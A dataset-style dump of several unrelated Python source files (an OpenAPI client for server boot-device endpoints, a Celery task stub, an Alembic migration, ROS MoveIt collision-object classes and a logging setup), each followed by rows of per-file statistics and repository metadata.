        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the server.
            Default is True.
        _host_index (int/None): index of the server to use. Default is read
            from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootUefiShellDevice, or the request thread when async_req is True.
    """
    # Fill in the client-control keywords with their defaults, leaving any
    # caller-supplied values untouched.
    for option, fallback in (
        ('async_req', False),
        ('_return_http_data_only', True),
        ('_preload_content', True),
        ('_request_timeout', None),
        ('_check_input_type', True),
        ('_check_return_type', True),
    ):
        kwargs[option] = kwargs.get(option, fallback)
    # _host_index defaults to None (configuration decides later).
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Positional arguments travel through kwargs to the endpoint machinery.
    kwargs['moid'] = moid
    kwargs['boot_uefi_shell_device'] = boot_uefi_shell_device
    return self.call_with_http_info(**kwargs)
# Register the public endpoint for updating a 'boot.UefiShellDevice' resource.
# _Endpoint (project class) binds the HTTP/validation metadata below to the
# private callable so calls are validated and dispatched via call_with_http_info.
self.update_boot_uefi_shell_device = _Endpoint(
    settings={
        'response_type': (BootUefiShellDevice,),  # type the response body is deserialized into
        'auth': [  # accepted auth schemes for this operation
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): 'oAuth2' listed twice — presumably a generator artifact; confirm
        ],
        'endpoint_path': '/api/v1/boot/UefiShellDevices/{Moid}',  # {Moid} is filled from the 'moid' param
        'operation_id': 'update_boot_uefi_shell_device',
        'http_method': 'POST',
        'servers': None,  # None -> use the configured default host
    },
    params_map={
        'all': [
            'moid',
            'boot_uefi_shell_device',
            'if_match',
        ],
        'required': [  # enforced before the request is sent
            'moid',
            'boot_uefi_shell_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {  # expected Python types per parameter
            'moid':
                (str,),
            'boot_uefi_shell_device':
                (BootUefiShellDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {  # python_name -> wire name (body params have no entry)
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {  # where each parameter is placed in the HTTP request
            'moid': 'path',
            'boot_uefi_shell_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_uefi_shell_device
)
def __update_boot_usb_device(
    self,
    moid,
    boot_usb_device,
    **kwargs
):
    """Update a 'boot.UsbDevice' resource.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request thread
    back instead of the result.

    >>> thread = api.update_boot_usb_device(moid, boot_usb_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_usb_device (BootUsbDevice): The 'boot.UsbDevice' resource to
            update.

    Keyword Args:
        if_match (str): Optional If-Match header (resource ModTime) that
            guards against the lost-update problem; a stale value makes the
            server answer 412 (Precondition Failed). [optional]
        _return_http_data_only (bool): return only the response data, without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding it. Default is True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the server.
            Default is True.
        _host_index (int/None): index of the server to use. Default is read
            from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootUsbDevice, or the request thread when async_req is True.
    """
    # Client-control options and their defaults; setdefault leaves any
    # caller-supplied value in place, matching kwargs.get(key, default).
    _option_defaults = {
        'async_req': False,
        '_return_http_data_only': True,
        '_preload_content': True,
        '_request_timeout': None,
        '_check_input_type': True,
        '_check_return_type': True,
    }
    for option, fallback in _option_defaults.items():
        kwargs.setdefault(option, fallback)
    # _host_index defaults to None (configuration decides later).
    kwargs['_host_index'] = kwargs.get('_host_index')
    # Positional arguments travel through kwargs to the endpoint machinery.
    kwargs['moid'] = moid
    kwargs['boot_usb_device'] = boot_usb_device
    return self.call_with_http_info(**kwargs)
# Register the public endpoint for updating a 'boot.UsbDevice' resource.
# _Endpoint (project class) binds the HTTP/validation metadata below to the
# private callable so calls are validated and dispatched via call_with_http_info.
self.update_boot_usb_device = _Endpoint(
    settings={
        'response_type': (BootUsbDevice,),  # type the response body is deserialized into
        'auth': [  # accepted auth schemes for this operation
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): 'oAuth2' listed twice — presumably a generator artifact; confirm
        ],
        'endpoint_path': '/api/v1/boot/UsbDevices/{Moid}',  # {Moid} is filled from the 'moid' param
        'operation_id': 'update_boot_usb_device',
        'http_method': 'POST',
        'servers': None,  # None -> use the configured default host
    },
    params_map={
        'all': [
            'moid',
            'boot_usb_device',
            'if_match',
        ],
        'required': [  # enforced before the request is sent
            'moid',
            'boot_usb_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {  # expected Python types per parameter
            'moid':
                (str,),
            'boot_usb_device':
                (BootUsbDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {  # python_name -> wire name (body params have no entry)
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {  # where each parameter is placed in the HTTP request
            'moid': 'path',
            'boot_usb_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_usb_device
)
def __update_boot_vmedia_device(
    self,
    moid,
    boot_vmedia_device,
    **kwargs
):
    """Update a 'boot.VmediaDevice' resource.  # noqa: E501

    Synchronous by default; pass async_req=True to get the request thread
    back instead of the result.

    >>> thread = api.update_boot_vmedia_device(moid, boot_vmedia_device, async_req=True)
    >>> result = thread.get()

    Args:
        moid (str): The unique Moid identifier of a resource instance.
        boot_vmedia_device (BootVmediaDevice): The 'boot.VmediaDevice'
            resource to update.

    Keyword Args:
        if_match (str): Optional If-Match header (resource ModTime) that
            guards against the lost-update problem; a stale value makes the
            server answer 412 (Precondition Failed). [optional]
        _return_http_data_only (bool): return only the response data, without
            status code and headers. Default is True.
        _preload_content (bool): if False, return the raw
            urllib3.HTTPResponse without reading/decoding it. Default is True.
        _request_timeout (float/tuple): total timeout, or a
            (connection, read) pair. Default is None.
        _check_input_type (bool): type-check data sent to the server.
            Default is True.
        _check_return_type (bool): type-check data received from the server.
            Default is True.
        _host_index (int/None): index of the server to use. Default is read
            from the configuration.
        async_req (bool): execute request asynchronously.

    Returns:
        BootVmediaDevice, or the request thread when async_req is True.
    """
    # Resolve every client-control option against its default (caller wins),
    # fold in the positional arguments, and hand the lot to the dispatcher.
    kwargs.update(
        async_req=kwargs.get('async_req', False),
        _return_http_data_only=kwargs.get('_return_http_data_only', True),
        _preload_content=kwargs.get('_preload_content', True),
        _request_timeout=kwargs.get('_request_timeout', None),
        _check_input_type=kwargs.get('_check_input_type', True),
        _check_return_type=kwargs.get('_check_return_type', True),
        _host_index=kwargs.get('_host_index'),
        moid=moid,
        boot_vmedia_device=boot_vmedia_device,
    )
    return self.call_with_http_info(**kwargs)
# Register the public endpoint for updating a 'boot.VmediaDevice' resource.
# _Endpoint (project class) binds the HTTP/validation metadata below to the
# private callable so calls are validated and dispatched via call_with_http_info.
self.update_boot_vmedia_device = _Endpoint(
    settings={
        'response_type': (BootVmediaDevice,),  # type the response body is deserialized into
        'auth': [  # accepted auth schemes for this operation
            'cookieAuth',
            'http_signature',
            'oAuth2',
            'oAuth2'  # NOTE(review): 'oAuth2' listed twice — presumably a generator artifact; confirm
        ],
        'endpoint_path': '/api/v1/boot/VmediaDevices/{Moid}',  # {Moid} is filled from the 'moid' param
        'operation_id': 'update_boot_vmedia_device',
        'http_method': 'POST',
        'servers': None,  # None -> use the configured default host
    },
    params_map={
        'all': [
            'moid',
            'boot_vmedia_device',
            'if_match',
        ],
        'required': [  # enforced before the request is sent
            'moid',
            'boot_vmedia_device',
        ],
        'nullable': [
        ],
        'enum': [
        ],
        'validation': [
        ]
    },
    root_map={
        'validations': {
        },
        'allowed_values': {
        },
        'openapi_types': {  # expected Python types per parameter
            'moid':
                (str,),
            'boot_vmedia_device':
                (BootVmediaDevice,),
            'if_match':
                (str,),
        },
        'attribute_map': {  # python_name -> wire name (body params have no entry)
            'moid': 'Moid',
            'if_match': 'If-Match',
        },
        'location_map': {  # where each parameter is placed in the HTTP request
            'moid': 'path',
            'boot_vmedia_device': 'body',
            'if_match': 'header',
        },
        'collection_format_map': {
        }
    },
    headers_map={
        'accept': [
            'application/json'
        ],
        'content_type': [
            'application/json',
            'application/json-patch+json'
        ]
    },
    api_client=api_client,
    callable=__update_boot_vmedia_device
)
| 46.317133
| 1,678
| 0.509696
| 38,130
| 393,603
| 5.090139
| 0.015526
| 0.018827
| 0.015539
| 0.016137
| 0.975666
| 0.971703
| 0.96213
| 0.956349
| 0.956133
| 0.954412
| 0
| 0.002728
| 0.41519
| 393,603
| 8,497
| 1,679
| 46.322584
| 0.840457
| 0.437075
| 0
| 0.767658
| 0
| 0
| 0.228145
| 0.055268
| 0
| 0
| 0
| 0
| 0
| 1
| 0.009806
| false
| 0
| 0.005484
| 0
| 0.025096
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
380d43744215fb14d018f9e2faf67475e98917f8
| 92
|
py
|
Python
|
djaein/personal/tasks.py
|
0PEIN0/djaein
|
ec02d977ff323c232ddca66cf97cf8824eeb9f93
|
[
"MIT"
] | null | null | null |
djaein/personal/tasks.py
|
0PEIN0/djaein
|
ec02d977ff323c232ddca66cf97cf8824eeb9f93
|
[
"MIT"
] | null | null | null |
djaein/personal/tasks.py
|
0PEIN0/djaein
|
ec02d977ff323c232ddca66cf97cf8824eeb9f93
|
[
"MIT"
] | null | null | null |
from celery import shared_task
@shared_task
def mark_old_to_do_as_done():
    """Celery task stub.

    NOTE(review): despite the name, no to-do items are queried or modified
    here — the body only returns True. Presumably a placeholder for a
    periodic cleanup task; confirm before scheduling it.
    """
    return True
| 13.142857
| 30
| 0.793478
| 16
| 92
| 4.125
| 0.875
| 0.30303
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.163043
| 92
| 6
| 31
| 15.333333
| 0.857143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0.25
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
69765513b07c24a18965d7e495e0f85a327bc2eb
| 3,925
|
py
|
Python
|
migrations/versions/590c9969421e_.py
|
ahmedsalahacc/fyur
|
7289e94e08b0dc3fa460d5a10535eaf59a9561e9
|
[
"MIT"
] | null | null | null |
migrations/versions/590c9969421e_.py
|
ahmedsalahacc/fyur
|
7289e94e08b0dc3fa460d5a10535eaf59a9561e9
|
[
"MIT"
] | null | null | null |
migrations/versions/590c9969421e_.py
|
ahmedsalahacc/fyur
|
7289e94e08b0dc3fa460d5a10535eaf59a9561e9
|
[
"MIT"
] | null | null | null |
"""empty message
Revision ID: 590c9969421e
Revises: 129dcb5dac70
Create Date: 2020-09-20 13:52:19.620499
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '590c9969421e'
down_revision = '129dcb5dac70'
branch_labels = None
depends_on = None
def upgrade():
    """Create the capitalized tables, then drop the old lowercase ones.

    The new tables are created before the old ones are dropped; the names
    differ only in case, which PostgreSQL treats as distinct identifiers.
    NOTE(review): 'Shows' carries no foreign keys to 'Artists'/'Venues' —
    presumably relations are handled elsewhere; confirm against the models.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('Artists',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('name', sa.String(), nullable=False),
        sa.Column('city', sa.String(length=120), nullable=False),
        sa.Column('state', sa.String(length=120), nullable=False),
        sa.Column('phone', sa.String(length=120), nullable=False),
        sa.Column('genres', sa.String(length=120), nullable=False),
        sa.Column('image_link', sa.String(length=500), nullable=False),
        sa.Column('facebook_link', sa.String(length=120), nullable=False),
        sa.PrimaryKeyConstraint('id')
    )
    op.create_table('Shows',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('name', sa.String(), nullable=True),  # only nullable column here
        sa.Column('startTime', sa.DateTime(), nullable=False),
        sa.Column('category', sa.String(), nullable=False),
        sa.PrimaryKeyConstraint('id')
    )
    op.create_table('Venues',
        sa.Column('id', sa.Integer(), nullable=False),
        sa.Column('name', sa.String(), nullable=False),
        sa.Column('city', sa.String(length=120), nullable=False),
        sa.Column('state', sa.String(length=120), nullable=False),
        sa.Column('address', sa.String(length=120), nullable=False),
        sa.Column('phone', sa.String(length=120), nullable=True),
        sa.Column('image_link', sa.String(length=500), nullable=True),
        sa.Column('facebook_link', sa.String(length=120), nullable=True),
        sa.PrimaryKeyConstraint('id')
    )
    # Drop the superseded lowercase tables last so a failure above leaves them intact.
    op.drop_table('venues')
    op.drop_table('artists')
    op.drop_table('shows')
    # ### end Alembic commands ###
def downgrade():
    """Restore the old lowercase tables, then drop the capitalized ones.

    Mirrors upgrade() in reverse. NOTE(review): the restored 'shows' table
    has only id/startTime — the name/category columns added by upgrade()
    are not reproduced, so data in them is lost on downgrade.
    """
    # ### commands auto generated by Alembic - please adjust! ###
    op.create_table('shows',
        sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
        sa.Column('startTime', postgresql.TIMESTAMP(), autoincrement=False, nullable=False),
        sa.PrimaryKeyConstraint('id', name='shows_pkey')
    )
    op.create_table('artists',
        sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
        sa.Column('name', sa.VARCHAR(), autoincrement=False, nullable=False),
        sa.Column('city', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
        sa.Column('state', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
        sa.Column('phone', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
        sa.Column('genres', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
        sa.Column('image_link', sa.VARCHAR(length=500), autoincrement=False, nullable=False),
        sa.Column('facebook_link', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
        sa.PrimaryKeyConstraint('id', name='artists_pkey')
    )
    op.create_table('venues',
        sa.Column('id', sa.INTEGER(), autoincrement=True, nullable=False),
        sa.Column('name', sa.VARCHAR(), autoincrement=False, nullable=False),
        sa.Column('city', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
        sa.Column('state', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
        sa.Column('address', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
        sa.Column('phone', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
        sa.Column('image_link', sa.VARCHAR(length=500), autoincrement=False, nullable=False),
        sa.Column('facebook_link', sa.VARCHAR(length=120), autoincrement=False, nullable=False),
        sa.PrimaryKeyConstraint('id', name='venues_pkey')
    )
    op.drop_table('Venues')
    op.drop_table('Shows')
    op.drop_table('Artists')
    # ### end Alembic commands ###
| 44.101124
| 92
| 0.694777
| 502
| 3,925
| 5.380478
| 0.14741
| 0.112551
| 0.188819
| 0.225472
| 0.81007
| 0.807108
| 0.797482
| 0.771196
| 0.708997
| 0.611996
| 0
| 0.03631
| 0.129936
| 3,925
| 88
| 93
| 44.602273
| 0.754612
| 0.075159
| 0
| 0.380282
| 0
| 0
| 0.103813
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.028169
| false
| 0
| 0.042254
| 0
| 0.070423
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
69bf2788e42be7d1c935d4f908e3fe3d6e71ce92
| 16,096
|
py
|
Python
|
panda_autograsp/src/panda_autograsp/moveit_collision_objects.py
|
rickstaa/panda-autograsp
|
bfa1952ad8d0be86b554d8afdddd6aaa6d22040c
|
[
"MIT"
] | 7
|
2020-12-02T04:09:35.000Z
|
2022-03-11T06:24:49.000Z
|
panda_autograsp/src/panda_autograsp/moveit_collision_objects.py
|
rickstaa/panda_autograsp
|
bfa1952ad8d0be86b554d8afdddd6aaa6d22040c
|
[
"MIT"
] | 84
|
2019-07-04T20:49:46.000Z
|
2020-11-24T12:08:46.000Z
|
panda_autograsp/src/panda_autograsp/moveit_collision_objects.py
|
rickstaa/panda_autograsp
|
bfa1952ad8d0be86b554d8afdddd6aaa6d22040c
|
[
"MIT"
] | 2
|
2020-11-25T14:38:58.000Z
|
2022-01-24T15:41:32.000Z
|
"""Module that contains a number of constraint object classes
that can be used to add constraint to the moveit planning
scene. It was created since the moveit_commander doesn't yet
contain a addCollisionObjects method. As a result using the
standard collision_object_msgs and shape_msgs was not ideal."""
# ROS messages and services
from geometry_msgs.msg import PoseStamped
#################################################
# Constraint classes ############################
#################################################
class Box(object):
    """Moveit Box collision object class.

    Attributes
    ------------
    type : :py:obj:`str`
        Collision object type (always ``"box"``).
    name : :py:obj:`str`
        The name of the object.
    size : :py:obj:`tuple`
        The size of the box specified as (x, y, z).
    pose : :py:obj:`!geometry_msgs.PoseStamped`
        The pose of the collision object.
    """

    def __init__(
        self,
        name,
        size_x=1.0,
        size_y=1.0,
        size_z=1.0,
        x_pos=0.0,
        y_pos=0.0,
        z_pos=0.0,
        x_rot=0.0,
        y_rot=0.0,
        z_rot=0.0,
        w_rot=1.0,
        reference_frame="world",
    ):
        """
        Parameters
        ----------
        name : :py:obj:`str`
            The name of the object.
        size_x : :py:obj:`float`, optional
            The x-dimensions size of the box, by default 1.0
        size_y : :py:obj:`float`, optional
            The y-dimensions size of the box, by default 1.0
        size_z : :py:obj:`float`, optional
            The z-dimensions size of the box, by default 1.0
        x_pos : :py:obj:`float`, optional
            The x position in link_name frame, by default 0.0.
        y_pos : :py:obj:`float`, optional
            The y position in link_name frame, by default 0.0.
        z_pos : :py:obj:`float`, optional
            The z position in link_name frame, by default 0.0.
        x_rot : :py:obj:`float`, optional
            The x orientation relative to the link_name frame, by default 0.0.
        y_rot : :py:obj:`float`, optional
            The y orientation relative to the link_name frame, by default 0.0.
        z_rot : :py:obj:`float`, optional
            The z orientation relative to the link_name frame, by default 0.0.
        w_rot : :py:obj:`float`, optional
            The w orientation relative to the link_name frame, by default 1.0.
        reference_frame : :py:obj:`str`, optional
            The frame in which the pose is expressed, by default world.
        """
        # Set member variables
        self.type = "box"
        self.name = name
        self.pose = PoseStamped()
        self.pose.header.frame_id = reference_frame
        self.pose.pose.position.x = x_pos
        self.pose.pose.position.y = y_pos
        self.pose.pose.position.z = z_pos
        self.pose.pose.orientation.x = x_rot
        self.pose.pose.orientation.y = y_rot
        self.pose.pose.orientation.z = z_rot
        self.pose.pose.orientation.w = w_rot
        # BUG FIX: original stored (size_y, size_y, size_z), silently dropping
        # size_x and using size_y for the x dimension.
        self._size = (size_x, size_y, size_z)

    @property
    def size(self):
        """The size of the collision object as an (x, y, z) tuple."""
        return self._size

    @size.setter
    def size(self, value):
        if not isinstance(value, tuple) or len(value) != 3:  # Validate if tuple
            raise Exception("Size should be a tuple of length 3 (x, y, z).")
        self._size = value
class Plane(object):
    """Moveit Plane collision object class.

    .. note::

        This class uses the plane equation Ax + By + Cz + D = 0
        to construct the plane. In this (A, B, C) are the coordinates
        of the plane normal (orientation), stored unit-length, and
        D the offset along the normal.

    Attributes
    ------------
    type : :py:obj:`str`
        Collision object type (always ``"plane"``).
    name : :py:obj:`str`
        The name of the object.
    normal : :py:obj:`tuple`
        Unit-length plane normal specified as (x, y, z).
    offset : :py:obj:`float`
        Plane offset relative to the normal.
    pose : :py:obj:`!geometry_msgs.PoseStamped`
        The pose of the collision object.
    """

    def __init__(
        self,
        name,
        normal_x=0.0,
        normal_y=0.0,
        normal_z=1.0,
        offset=0.0,
        x_pos=0.0,
        y_pos=0.0,
        z_pos=0.0,
        x_rot=0.0,
        y_rot=0.0,
        z_rot=0.0,
        w_rot=1.0,
        reference_frame="world",
    ):
        """
        Parameters
        ----------
        name : :py:obj:`str`
            The name of the object.
        normal_x : :py:obj:`float`, optional
            The normal vector x coordinate, by default 0.0.
        normal_y : :py:obj:`float`, optional
            The normal vector y coordinate, by default 0.0.
        normal_z : :py:obj:`float`, optional
            The normal vector z coordinate, by default 1.0.
        offset : py:obj:`float`, optional
            Plane offset relative to the normal, by default 0.0
        x_pos : :py:obj:`float`, optional
            The x position in link_name frame, by default 0.0.
        y_pos : :py:obj:`float`, optional
            The y position in link_name frame, by default 0.0.
        z_pos : :py:obj:`float`, optional
            The z position in link_name frame, by default 0.0.
        x_rot : :py:obj:`float`, optional
            The x orientation relative to the link_name frame, by default 0.0.
        y_rot : :py:obj:`float`, optional
            The y orientation relative to the link_name frame, by default 0.0.
        z_rot : :py:obj:`float`, optional
            The z orientation relative to the link_name frame, by default 0.0.
        w_rot : :py:obj:`float`, optional
            The w orientation relative to the link_name frame, by default 1.0.
        reference_frame : :py:obj:`str`, optional
            The frame in which the pose is expressed, by default world.
        """
        # Set member variables
        self.type = "plane"
        self.name = name
        self.offset = offset
        self.reference_frame = reference_frame
        self._normal = self._unit_normal((normal_x, normal_y, normal_z))
        self.pose = PoseStamped()
        self.pose.header.frame_id = reference_frame
        self.pose.pose.position.x = x_pos
        self.pose.pose.position.y = y_pos
        self.pose.pose.position.z = z_pos
        self.pose.pose.orientation.x = x_rot
        self.pose.pose.orientation.y = y_rot
        self.pose.pose.orientation.z = z_rot
        self.pose.pose.orientation.w = w_rot

    @staticmethod
    def _unit_normal(value):
        """Scale *value* to unit Euclidean length.

        BUG FIX: the original divided each component by the component SUM,
        which is not a normalization — it flipped the direction of normals
        with a negative sum (e.g. (0, 0, -1) became (0, 0, 1)) and raised
        ZeroDivisionError for valid normals such as (1, -1, 0).
        A zero vector still raises ZeroDivisionError, as before.
        """
        x, y, z = (float(ti) for ti in value)
        magnitude = (x * x + y * y + z * z) ** 0.5
        return (x / magnitude, y / magnitude, z / magnitude)

    @property
    def normal(self):
        """The unit-length plane normal."""
        return self._normal

    @normal.setter
    def normal(self, value):
        if not isinstance(value, tuple) or len(value) != 3:  # Validate if tuple
            # FIX: message said "Size" although this is the normal setter.
            raise Exception("Normal should be a tuple of length 3 (x, y, z).")
        self._normal = self._unit_normal(value)
class Cylinder(object):
    """Moveit cylinder collision object.

    Attributes
    ------------
    type : :py:obj:`str`
        Collision object type (always ``"cylinder"``).
    name : :py:obj:`str`
        The name of the object.
    height : :py:obj:`float`
        The height of the cylinder.
    radius : :py:obj:`float`
        The radius of the cylinder.
    pose : :py:obj:`!geometry_msgs.PoseStamped`
        The object pose in the reference frame.
    """

    def __init__(
        self,
        name,
        height=1.0,
        radius=1.0,
        x_pos=0.0,
        y_pos=0.0,
        z_pos=0.0,
        x_rot=0.0,
        y_rot=0.0,
        z_rot=0.0,
        w_rot=1.0,
        reference_frame="world",
    ):
        """
        Parameters
        ----------
        name : :py:obj:`str`
            The name of the object.
        height : :py:obj:`float`, optional
            The height of the cylinder, by default 1.0.
        radius : :py:obj:`float`, optional
            The radius of the cylinder, by default 1.0.
        x_pos, y_pos, z_pos : :py:obj:`float`, optional
            Position in the reference frame, each 0.0 by default.
        x_rot, y_rot, z_rot, w_rot : :py:obj:`float`, optional
            Orientation quaternion relative to the reference frame;
            defaults (0, 0, 0, 1), i.e. no rotation.
        reference_frame : :py:obj:`str`, optional
            The frame in which the pose is expressed, by default world.
        """
        # Shape parameters.
        self.type = "cylinder"
        self.name = name
        self.height = height
        self.radius = radius
        # Build the stamped pose from the scalar arguments.
        pose_msg = PoseStamped()
        pose_msg.header.frame_id = reference_frame
        position = pose_msg.pose.position
        position.x, position.y, position.z = x_pos, y_pos, z_pos
        orientation = pose_msg.pose.orientation
        orientation.x, orientation.y, orientation.z, orientation.w = (
            x_rot,
            y_rot,
            z_rot,
            w_rot,
        )
        self.pose = pose_msg
class Sphere(object):
    """Moveit sphere collision object.

    Attributes
    ------------
    type : :py:obj:`str`
        Collision object type (always ``"sphere"``).
    name : :py:obj:`str`
        The name of the object.
    radius : :py:obj:`float`
        The radius of the sphere.
    pose : :py:obj:`!geometry_msgs.PoseStamped`
        The object pose in the reference frame.
    """

    def __init__(
        self,
        name,
        radius=1.0,
        x_pos=0.0,
        y_pos=0.0,
        z_pos=0.0,
        x_rot=0.0,
        y_rot=0.0,
        z_rot=0.0,
        w_rot=1.0,
        reference_frame="world",
    ):
        """
        Parameters
        ----------
        name : :py:obj:`str`
            The name of the object.
        radius : :py:obj:`float`, optional
            The radius of the sphere, by default 1.0.
        x_pos, y_pos, z_pos : :py:obj:`float`, optional
            Position in the reference frame, each 0.0 by default.
        x_rot, y_rot, z_rot, w_rot : :py:obj:`float`, optional
            Orientation quaternion relative to the reference frame;
            defaults (0, 0, 0, 1), i.e. no rotation.
        reference_frame : :py:obj:`str`, optional
            The frame in which the pose is expressed, by default world.
        """
        # Shape parameters.
        self.type = "sphere"
        self.name = name
        self.radius = radius
        # Build the stamped pose; assign each component by attribute name.
        self.pose = PoseStamped()
        self.pose.header.frame_id = reference_frame
        for axis, coordinate in zip("xyz", (x_pos, y_pos, z_pos)):
            setattr(self.pose.pose.position, axis, coordinate)
        for axis, component in zip("xyzw", (x_rot, y_rot, z_rot, w_rot)):
            setattr(self.pose.pose.orientation, axis, component)
class Mesh(object):
    """Moveit mesh collision object.

    Attributes
    ------------
    type : :py:obj:`str`
        Collision object type (always ``"mesh"``).
    name : :py:obj:`str`
        The name of the object.
    file_name : :py:obj:`str`
        The location of the mesh file.
    pose : :py:obj:`!geometry_msgs.PoseStamped`
        The object pose in the reference frame.
    """

    def __init__(
        self,
        name,
        file_name,
        x_pos=0.0,
        y_pos=0.0,
        z_pos=0.0,
        x_rot=0.0,
        y_rot=0.0,
        z_rot=0.0,
        w_rot=1.0,
        reference_frame="world",
    ):
        """
        Parameters
        ----------
        name : :py:obj:`str`
            The name of the object.
        file_name : :py:obj:`str`
            The location of the mesh file.
        x_pos, y_pos, z_pos : :py:obj:`float`, optional
            Position in the reference frame, each 0.0 by default.
        x_rot, y_rot, z_rot, w_rot : :py:obj:`float`, optional
            Orientation quaternion relative to the reference frame;
            defaults (0, 0, 0, 1), i.e. no rotation.
        reference_frame : :py:obj:`str`, optional
            The frame in which the pose is expressed, by default world.
        """
        # Assemble the stamped pose first, then store all members at once.
        stamped = PoseStamped()
        stamped.header.frame_id = reference_frame
        stamped.pose.position.x = x_pos
        stamped.pose.position.y = y_pos
        stamped.pose.position.z = z_pos
        stamped.pose.orientation.x = x_rot
        stamped.pose.orientation.y = y_rot
        stamped.pose.orientation.z = z_rot
        stamped.pose.orientation.w = w_rot
        self.type = "mesh"
        self.name = name
        self.file_name = file_name
        self.pose = stamped
| 35.144105
| 80
| 0.56542
| 2,280
| 16,096
| 3.873684
| 0.061842
| 0.056046
| 0.079257
| 0.091712
| 0.860734
| 0.849751
| 0.828691
| 0.813859
| 0.808877
| 0.799592
| 0
| 0.017048
| 0.325795
| 16,096
| 457
| 81
| 35.221007
| 0.796812
| 0.589587
| 0
| 0.765432
| 0
| 0
| 0.028525
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055556
| false
| 0
| 0.006173
| 0
| 0.104938
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
38534448b4d7b87c66793340efb46ae589b91907
| 174
|
py
|
Python
|
zmon_worker_monitor/zmon_worker/tasks/__init__.py
|
heroldus/zmon-worker
|
458f8bacb5a00f7fd93d59db406a2c80870519d1
|
[
"Apache-2.0"
] | 17
|
2016-06-03T14:59:21.000Z
|
2020-11-06T13:12:18.000Z
|
zmon_worker_monitor/zmon_worker/tasks/__init__.py
|
heroldus/zmon-worker
|
458f8bacb5a00f7fd93d59db406a2c80870519d1
|
[
"Apache-2.0"
] | 394
|
2016-06-03T14:47:37.000Z
|
2020-04-21T09:31:23.000Z
|
zmon_worker_monitor/zmon_worker/tasks/__init__.py
|
heroldus/zmon-worker
|
458f8bacb5a00f7fd93d59db406a2c80870519d1
|
[
"Apache-2.0"
] | 55
|
2016-08-15T12:42:28.000Z
|
2021-04-06T10:49:35.000Z
|
import logging
logging.getLogger('requests.packages.urllib3.connectionpool').setLevel(logging.WARNING)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
| 34.8
| 87
| 0.844828
| 18
| 174
| 8.166667
| 0.5
| 0.217687
| 0.394558
| 0.489796
| 0.585034
| 0
| 0
| 0
| 0
